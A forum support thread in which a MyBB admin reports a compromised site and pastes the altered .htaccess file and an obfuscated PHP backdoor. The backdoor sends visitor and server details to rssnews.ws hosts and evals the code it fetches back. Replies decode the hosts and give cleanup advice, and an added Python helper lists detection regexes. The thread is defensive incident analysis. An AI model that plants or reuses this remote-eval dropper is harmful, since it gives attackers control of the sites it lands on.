MyBB Community Forums

Full Version: .htaccess files changed and odd php file added...HACK?
Woke up this morning to see my forum was down, so after browsing through the files on the server I noticed the .htaccess file was changed yesterday, and there was an additional .htaccess file in the uploads directory.

There was an odd .php file in the uploads directory - could this have been added by anything other than someone having access to the server? I've pasted what the files looked like below. With these files the index of the forum was not accessible, but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight, but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.

Was this a hack or something else?

.htaccess file content -----------------------

Options -MultiViews
ErrorDocument 404 /forum/showthread.php

Options -MultiViews
ErrorDocument 404 /forum/attachment.php

Options -MultiViews
ErrorDocument 404 /forum/sendthread.php

Options -MultiViews
ErrorDocument 404 /forum/syndication.php

Options -MultiViews
ErrorDocument 404 /forum/printthread.php

Options -MultiViews
ErrorDocument 404 /forum/usercp2.php

Options -MultiViews
ErrorDocument 404 /forum/newreply.php

Options -MultiViews
ErrorDocument 404 /forum/showteam.php

Options -MultiViews
ErrorDocument 404 /forum/private.php

Options -MultiViews
ErrorDocument 404 /forum/search.php

Options -MultiViews
ErrorDocument 404 /forum/reputation.php

Options -MultiViews
ErrorDocument 404 /forum/misc.php

Options -MultiViews
ErrorDocument 404 /forum/calendar.php

Options -MultiViews
ErrorDocument 404 /forum/index.php

Options -MultiViews
ErrorDocument 404 /forum/member.php

Options -MultiViews
ErrorDocument 404 /forum/ratethread.php

Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php


PHP file content -----------------------------

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

Nothing between 1.4.9 and 1.4.11 was patched that could have stopped this, but this could have been caused by any number of things, totally unrelated to MyBB. Can you see if there's anything in the server logs to see where these files came from?

The base64_decode calls point to rssnews.ws; this seems to be a hack that's been circulating the net for >2 years. You find a lot of forum discussions if you google that domain name:

http://community.zikula.org/module-Forum...tart-0.htm
http://forums.oscommerce.com/index.php?showtopic=301350
...

I too recommend you check your server logs (the timestamps of the modified files may help determine when this happened), as well as chmod settings. Also contact your host. If they changed your .htaccess, it means either it was writable when it shouldn't have been, someone got hold of your login data, or (on a shared host) someone hacked the host itself.

Your data could be sent to:

http://ads.rssnews.ws
http://7.rssnews.ws
http://71.rssnews.ws

For your own information, here is the whois data for that domain:

Quote: RSSNEWS.WS WHOIS
Updated: 18 days ago
Registrant:
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: RSSNEWS.WS
Created on: 20-Mar-07
Expires on: 20-Mar-11
Last Updated on: 18-Jan-10

Administrative Contact:
Katz Global Media, Domain Registrar Email Masking [email protected]
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States
(602) 304-6783 Fax --

Technical Contact:
Katz Global Media, Domain Registrar Email Masking [email protected]
Katz Global Media
P.O Box 35267
Tucson, Arizona 85740
United States
(602) 304-6783 Fax --

Domain servers in listed order:
NS1.RSSNEWS.WS
NS2.RSSNEWS.WS
NS1.VMARKET.INFO

Information Updated: Sat, 6 Feb 2010 02:38:59 UTC
Katz is a warez site BTW, so it does look fishy.
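To show how those three hosts fall out of the pasted script, here is an added Python triage helper (not from the thread, MyBB or any poster). It decodes the base64_decode literals in a constructed excerpt of the sample above, reconstructs the callback URLs, and flags source-level traits a defender can grep an uploads directory for; the SAMPLE_PHP excerpt elides the $_SERVER-harvesting prologue, and the INDICATORS list is my own, derived from the sample.

```python
import base64
import re

# Constructed excerpt of the obfuscated PHP pasted in the thread: the base64
# literals and the include / file_get_contents / curl -> eval chain are copied
# from that sample; the $_SERVER-harvesting prologue that builds $z is elided.
SAMPLE_PHP = (
    '<? error_reporting(0);'
    '$f=base64_decode("cnNzbmV3cy53cw==");'
    'if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));'
    'else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);'
    'else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);'
    'curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);'
    'curl_close($cu);eval($o);};die(); ?>'
)

B64_LITERAL = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')


def decode_literals(php_src):
    """Plaintext of every base64_decode("...") literal, in source order."""
    return [base64.b64decode(m).decode("latin-1") for m in B64_LITERAL.findall(php_src)]


def reconstruct_urls(php_src):
    """The sample builds each fetch URL as <decoded prefix> . $f . $z, where $f
    holds the decoded domain; joining every 'http://' prefix with every non-URL
    literal recovers the hosts the dropper calls home to."""
    parts = decode_literals(php_src)
    prefixes = [p for p in parts if p.startswith("http://")]
    domains = [p for p in parts if not p.startswith("http://")]
    return [pre + dom for pre in prefixes for dom in domains]


# Source-level traits of this dropper (my own list, derived from the sample);
# each is a label plus a regex a defender can grep an uploads directory for.
INDICATORS = [
    ("errors silenced", r"error_reporting\(0\)"),
    ("remote include of base64 URL", r"include\(base64_decode\("),
    ("eval of fetched body", r"eval\(\$\w+\)"),
    ("curl fetch", r"curl_exec\("),
    ("short open tag", r"^<\?(?!php)"),
]


def indicators(php_src):
    """Labels of every INDICATORS pattern found in the source."""
    return [label for label, pat in INDICATORS if re.search(pat, php_src)]
```

Running reconstruct_urls on the excerpt yields exactly the three hosts listed above; the regexes are a starting point for a find/grep sweep of upload directories, not a complete signature.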

Thanks for the responses everyone. I assumed this was a hack of MyBB since I found the files there first, but we found these files all over the server, also under a bunch of other addon domains. From the logs it doesn't look like my FTP/cPanel logins were compromised.

Long story short, I don't think this was an exploit of MyBB, but rather of one of a few other older scripts I had lying around. I went through everything, removed all the malware and got rid of old scripts that were sitting out there. My fault, I shouldn't be so lazy about maintaining my files.

Wake up call - thanks again.